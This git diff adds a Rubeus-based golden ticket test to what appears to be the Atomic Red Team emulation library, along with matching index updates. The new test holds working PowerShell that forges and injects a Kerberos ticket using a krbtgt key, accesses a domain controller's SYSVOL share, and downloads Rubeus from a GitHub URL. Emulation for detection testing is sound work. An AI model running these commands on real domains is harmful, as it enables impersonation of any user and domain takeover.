diff --git a/atomics/Indexes/Indexes-CSV/index.csv b/atomics/Indexes/Indexes-CSV/index.csv
index 2b21d515..422b0753 100644
--- a/atomics/Indexes/Indexes-CSV/index.csv
+++ b/atomics/Indexes/Indexes-CSV/index.csv
@@ -29,6 +29,7 @@ credential-access,T1187,Forced Authentication,1,PetitPotam,485ce873-2e65-4706-9c
credential-access,T1056.002,GUI Input Capture,1,AppleScript - Prompt User for Password,76628574-0bc1-4646-8fe2-8f4427b47d15,bash
credential-access,T1056.002,GUI Input Capture,2,PowerShell - Prompt User for Password,2b162bfd-0928-4d4c-9ec3-4d9f88374b52,powershell
credential-access,T1558.001,Golden Ticket,1,Crafting Active Directory golden tickets with mimikatz,9726592a-dabc-4d4d-81cd-44070008b3af,powershell
+credential-access,T1558.001,Golden Ticket,2,Crafting Active Directory golden tickets with Rubeus,e42d33cd-205c-4acf-ab59-a9f38f6bad9c,powershell
credential-access,T1552.006,Group Policy Preferences,1,GPP Passwords (findstr),870fe8fb-5e23-4f5f-b89d-dd7fe26f3b5f,command_prompt
credential-access,T1552.006,Group Policy Preferences,2,GPP Passwords (Get-GPPPassword),e9584f82-322c-474a-b831-940fd8b4455c,powershell
credential-access,T1558.003,Kerberoasting,1,Request for service tickets,3f987809-3681-43c8-bcd8-b3ff3a28533a,powershell
diff --git a/atomics/Indexes/Indexes-CSV/windows-index.csv b/atomics/Indexes/Indexes-CSV/windows-index.csv
index 4172b393..81a02ce8 100644
--- a/atomics/Indexes/Indexes-CSV/windows-index.csv
+++ b/atomics/Indexes/Indexes-CSV/windows-index.csv
@@ -17,6 +17,7 @@ credential-access,T1003.006,DCSync,1,DCSync (Active Directory),129efd28-8497-4c8
credential-access,T1187,Forced Authentication,1,PetitPotam,485ce873-2e65-4706-9c7e-ae3ab9e14213,powershell
credential-access,T1056.002,GUI Input Capture,2,PowerShell - Prompt User for Password,2b162bfd-0928-4d4c-9ec3-4d9f88374b52,powershell
credential-access,T1558.001,Golden Ticket,1,Crafting Active Directory golden tickets with mimikatz,9726592a-dabc-4d4d-81cd-44070008b3af,powershell
+credential-access,T1558.001,Golden Ticket,2,Crafting Active Directory golden tickets with Rubeus,e42d33cd-205c-4acf-ab59-a9f38f6bad9c,powershell
credential-access,T1552.006,Group Policy Preferences,1,GPP Passwords (findstr),870fe8fb-5e23-4f5f-b89d-dd7fe26f3b5f,command_prompt
credential-access,T1552.006,Group Policy Preferences,2,GPP Passwords (Get-GPPPassword),e9584f82-322c-474a-b831-940fd8b4455c,powershell
credential-access,T1558.003,Kerberoasting,1,Request for service tickets,3f987809-3681-43c8-bcd8-b3ff3a28533a,powershell
diff --git a/atomics/Indexes/Indexes-Markdown/index.md b/atomics/Indexes/Indexes-Markdown/index.md
index 69419661..b16940e6 100644
--- a/atomics/Indexes/Indexes-Markdown/index.md
+++ b/atomics/Indexes/Indexes-Markdown/index.md
@@ -51,6 +51,7 @@
- Atomic Test #2: PowerShell - Prompt User for Password [windows]
- [T1558.001 Golden Ticket](../../T1558.001/T1558.001.md)
- Atomic Test #1: Crafting Active Directory golden tickets with mimikatz [windows]
+ - Atomic Test #2: Crafting Active Directory golden tickets with Rubeus [windows]
- [T1552.006 Group Policy Preferences](../../T1552.006/T1552.006.md)
- Atomic Test #1: GPP Passwords (findstr) [windows]
- Atomic Test #2: GPP Passwords (Get-GPPPassword) [windows]
diff --git a/atomics/Indexes/Indexes-Markdown/windows-index.md b/atomics/Indexes/Indexes-Markdown/windows-index.md
index cf99f845..64d0eb39 100644
--- a/atomics/Indexes/Indexes-Markdown/windows-index.md
+++ b/atomics/Indexes/Indexes-Markdown/windows-index.md
@@ -35,6 +35,7 @@
- Atomic Test #2: PowerShell - Prompt User for Password [windows]
- [T1558.001 Golden Ticket](../../T1558.001/T1558.001.md)
- Atomic Test #1: Crafting Active Directory golden tickets with mimikatz [windows]
+ - Atomic Test #2: Crafting Active Directory golden tickets with Rubeus [windows]
- [T1552.006 Group Policy Preferences](../../T1552.006/T1552.006.md)
- Atomic Test #1: GPP Passwords (findstr) [windows]
- Atomic Test #2: GPP Passwords (Get-GPPPassword) [windows]
diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml
index c204df0a..6e8e9100 100644
--- a/atomics/Indexes/index.yaml
+++ b/atomics/Indexes/index.yaml
@@ -2156,7 +2156,8 @@ credential-access:
type: String
default: goldenticketfakeuser
krbtgt_aes256_key:
- description: Krbtgt AES256 key
+ description: Krbtgt AES256 key (you will need to set to match your krbtgt
+ key for your domain)
type: String
default: b7268361386090314acce8d9367e55f55865e7ef8e670fbe4262d6c94098a9e9
mimikatz_path:
@@ -2208,6 +2209,90 @@ credential-access:
loop so that 'break' can be used\n\n# show output from new empty session\nGet-Content
$env:TEMP\\golden.txt\n\n# cleanup temp files\nRemove-Item $env:TEMP\\golden.bat
-ErrorAction Ignore\nRemove-Item $env:TEMP\\golden.txt -ErrorAction Ignore\n"
+ - name: Crafting Active Directory golden tickets with Rubeus
+ auto_generated_guid: e42d33cd-205c-4acf-ab59-a9f38f6bad9c
+ description: |
+ Once the hash of the special krbtgt user is retrieved it is possible to craft Kerberos Ticket Granting Ticket impersonating any user in the Active Directory domain.
+ This test crafts a Golden Ticket and then performs an SMB request with it for the SYSVOL share, thus triggering a service ticket request (event ID 4769).
+ The generated ticket is injected in a new empty Windows session and discarded after, so it does not pollute the current Windows session.
+ supported_platforms:
+ - windows
+ input_arguments:
+ domaincontroller:
+ description: Targeted Active Directory domain FQDN
+ type: String
+ default: $ENV:logonserver.TrimStart('\') + "." + "$ENV:userdnsdomain"
+ account:
+ description: Account to impersonate
+ type: String
+ default: "$ENV:username"
+ krbtgt_aes256_key:
+ description: Krbtgt AES256 key (you will need to set to match your krbtgt
+ key for your domain)
+ type: String
+ default: b7268361386090314acce8d9367e55f55865e7ef8e670fbe4262d6c94098a9e9
+ local_folder:
+ description: Local path of Rubeus executable
+ type: Path
+ default: "$Env:temp"
+ local_executable:
+ description: name of the rubeus executable
+ type: String
+ default: rubeus.exe
+ rubeus_url:
+ description: URL of Rubeus executable
+ type: Url
+ default: https://github.com/morgansec/Rubeus/raw/de21c6607e9a07182a2d2eea20bb67a22d3fbf95/Rubeus/bin/Debug/Rubeus45.exe
+ dependency_executor_name: powershell
+ dependencies:
+ - description: 'Computer must be domain joined
+
+'
+ prereq_command: 'if((Get-CIMInstance -Class Win32_ComputerSystem).PartOfDomain)
+ {exit 0} else {exit 1}
+
+'
+ get_prereq_command: 'Write-Host Joining this computer to a domain must be
+ done manually
+
+'
+ - description: 'Rubeus must exist
+
+'
+ prereq_command: 'if(Test-Path -Path #{local_folder}\#{local_executable}) {exit
+ 0} else {exit 1}
+
+'
+ get_prereq_command: 'Invoke-Webrequest -Uri #{rubeus_url} -OutFile #{local_folder}\#{local_executable}
+
+'
+ executor:
+ name: powershell
+ elevation_required: false
+ command: "Remove-Item $env:TEMP\\golden.bat -ErrorAction Ignore\nRemove-Item
+ $env:TEMP\\golden.txt -ErrorAction Ignore\n\ncmd.exe /c \"#{local_folder}\\#{local_executable}\"
+ golden /aes256:#{krbtgt_aes256_key} /ldap /user:#{account} /dc:$(#{domaincontroller})
+ /printcmd /outfile:golden\n$filename = (Get-ChildItem | ? {$_.Name.startswith(\"golden_\")}
+ | Sort-Object -Descending -Property LastWriteTime | select -First 1).Name\n\n#
+ create batch file with commands to run in a separate \"runas /netonly\"
+ session\n# so we don't purge Kerberos ticket from the current Windows session\n#
+ its output goes to golden.txt temp file, because we cannot capture \"runas
+ /netonly\" output otherwise\n@\"\n>%TEMP%\\golden.txt 2>&1 (\n echo Purge
+ existing tickets and create golden ticket:\n klist purge\n cd %temp%\n
+ \ \"#{local_folder}\\#{local_executable}\" ptt /ticket:kirbifile\n\n echo.\n
+ \ echo Requesting SYSVOL:\n dir \\\\$(#{domaincontroller})\\SYSVOL\n \n
+ \ echo.\n echo Tickets after requesting SYSVOL:\n klist\n\n echo.\n echo
+ End of Golden Ticket attack\n)\n\"@ -Replace \"kirbifile\", $filename |
+ Out-File -Encoding OEM $env:TEMP\\golden.bat\n\n# run batch file in a new
+ empty session (password and username do not matter)\necho \"foo\" | runas
+ /netonly /user:fake \"$env:TEMP\\golden.bat\" | Out-Null\n\n# wait until
+ the output file has logged the entire attack\ndo {\n Start-Sleep 1 # wait
+ a bit so the output file has time to be created\n Get-Content -Path \"$env:TEMP\\golden.txt\"
+ -Wait | ForEach-Object {\n if ($_ -match 'End of Golden Ticket attack')
+ { break } \n }\n} while ($false) # dummy loop so that 'break' can be used\n\n#
+ show output from new empty session\nGet-Content $env:TEMP\\golden.txt\n\n#
+ cleanup temp files\nRemove-Item $env:TEMP\\golden.bat -ErrorAction Ignore\nRemove-Item
+ $env:TEMP\\golden.txt -ErrorAction Ignore\n"
T1552.006:
technique:
external_references:
diff --git a/atomics/T1558.001/T1558.001.md b/atomics/T1558.001/T1558.001.md
index 80ee7b38..244bd599 100644
--- a/atomics/T1558.001/T1558.001.md
+++ b/atomics/T1558.001/T1558.001.md
@@ -10,6 +10,8 @@ The KDC service runs all on domain controllers that are part of an Active Direct
- [Atomic Test #1 - Crafting Active Directory golden tickets with mimikatz](#atomic-test-1---crafting-active-directory-golden-tickets-with-mimikatz)
+- [Atomic Test #2 - Crafting Active Directory golden tickets with Rubeus](#atomic-test-2---crafting-active-directory-golden-tickets-with-rubeus)
+
@@ -33,7 +35,7 @@ The generated ticket is injected in a new empty Windows session and discarded af
| domain_sid | SID of the targeted domain, if you keep default it will automatically get the current domain SID | String | S-1-5-21-DEFAULT|
| domain | Targeted Active Directory domain FQDN | String | %userdnsdomain%|
| account | Account to impersonate | String | goldenticketfakeuser|
-| krbtgt_aes256_key | Krbtgt AES256 key | String | b7268361386090314acce8d9367e55f55865e7ef8e670fbe4262d6c94098a9e9|
+| krbtgt_aes256_key | Krbtgt AES256 key (you will need to set to match your krbtgt key for your domain) | String | b7268361386090314acce8d9367e55f55865e7ef8e670fbe4262d6c94098a9e9|
| mimikatz_path | Mimikatz windows executable | Path | $env:TEMP\mimikatz\x64\mimikatz.exe|
@@ -117,4 +119,110 @@ Move-Item $env:TEMP\mimikatz\x64\mimikatz.exe $mimikatz_path -Force
+
+
+
+## Atomic Test #2 - Crafting Active Directory golden tickets with Rubeus
+Once the hash of the special krbtgt user is retrieved it is possible to craft Kerberos Ticket Granting Ticket impersonating any user in the Active Directory domain.
+This test crafts a Golden Ticket and then performs an SMB request with it for the SYSVOL share, thus triggering a service ticket request (event ID 4769).
+The generated ticket is injected in a new empty Windows session and discarded after, so it does not pollute the current Windows session.
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** e42d33cd-205c-4acf-ab59-a9f38f6bad9c
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| domaincontroller | Targeted Active Directory domain FQDN | String | $ENV:logonserver.TrimStart('\') + "." + "$ENV:userdnsdomain"|
+| account | Account to impersonate | String | $ENV:username|
+| krbtgt_aes256_key | Krbtgt AES256 key (you will need to set to match your krbtgt key for your domain) | String | b7268361386090314acce8d9367e55f55865e7ef8e670fbe4262d6c94098a9e9|
+| local_folder | Local path of Rubeus executable | Path | $Env:temp|
+| local_executable | name of the rubeus executable | String | rubeus.exe|
+| rubeus_url | URL of Rubeus executable | Url | https://github.com/morgansec/Rubeus/raw/de21c6607e9a07182a2d2eea20bb67a22d3fbf95/Rubeus/bin/Debug/Rubeus45.exe|
+
+
+#### Attack Commands: Run with `powershell`!
+
+
+```powershell
+Remove-Item $env:TEMP\golden.bat -ErrorAction Ignore
+Remove-Item $env:TEMP\golden.txt -ErrorAction Ignore
+
+cmd.exe /c "#{local_folder}\#{local_executable}" golden /aes256:#{krbtgt_aes256_key} /ldap /user:#{account} /dc:$(#{domaincontroller}) /printcmd /outfile:golden
+$filename = (Get-ChildItem | ? {$_.Name.startswith("golden_")} | Sort-Object -Descending -Property LastWriteTime | select -First 1).Name
+
+# create batch file with commands to run in a separate "runas /netonly" session
+# so we don't purge Kerberos ticket from the current Windows session
+# its output goes to golden.txt temp file, because we cannot capture "runas /netonly" output otherwise
+@"
+>%TEMP%\golden.txt 2>&1 (
+ echo Purge existing tickets and create golden ticket:
+ klist purge
+ cd %temp%
+ "#{local_folder}\#{local_executable}" ptt /ticket:kirbifile
+
+ echo.
+ echo Requesting SYSVOL:
+ dir \\$(#{domaincontroller})\SYSVOL
+
+ echo.
+ echo Tickets after requesting SYSVOL:
+ klist
+
+ echo.
+ echo End of Golden Ticket attack
+)
+"@ -Replace "kirbifile", $filename | Out-File -Encoding OEM $env:TEMP\golden.bat
+
+# run batch file in a new empty session (password and username do not matter)
+echo "foo" | runas /netonly /user:fake "$env:TEMP\golden.bat" | Out-Null
+
+# wait until the output file has logged the entire attack
+do {
+ Start-Sleep 1 # wait a bit so the output file has time to be created
+ Get-Content -Path "$env:TEMP\golden.txt" -Wait | ForEach-Object {
+ if ($_ -match 'End of Golden Ticket attack') { break }
+ }
+} while ($false) # dummy loop so that 'break' can be used
+
+# show output from new empty session
+Get-Content $env:TEMP\golden.txt
+
+# cleanup temp files
+Remove-Item $env:TEMP\golden.bat -ErrorAction Ignore
+Remove-Item $env:TEMP\golden.txt -ErrorAction Ignore
+```
+
+
+
+
+#### Dependencies: Run with `powershell`!
+##### Description: Computer must be domain joined
+##### Check Prereq Commands:
+```powershell
+if((Get-CIMInstance -Class Win32_ComputerSystem).PartOfDomain) {exit 0} else {exit 1}
+```
+##### Get Prereq Commands:
+```powershell
+Write-Host Joining this computer to a domain must be done manually
+```
+##### Description: Rubeus must exist
+##### Check Prereq Commands:
+```powershell
+if(Test-Path -Path #{local_folder}\#{local_executable}) {exit 0} else {exit 1}
+```
+##### Get Prereq Commands:
+```powershell
+Invoke-Webrequest -Uri #{rubeus_url} -OutFile #{local_folder}\#{local_executable}
+```
+
+
+
+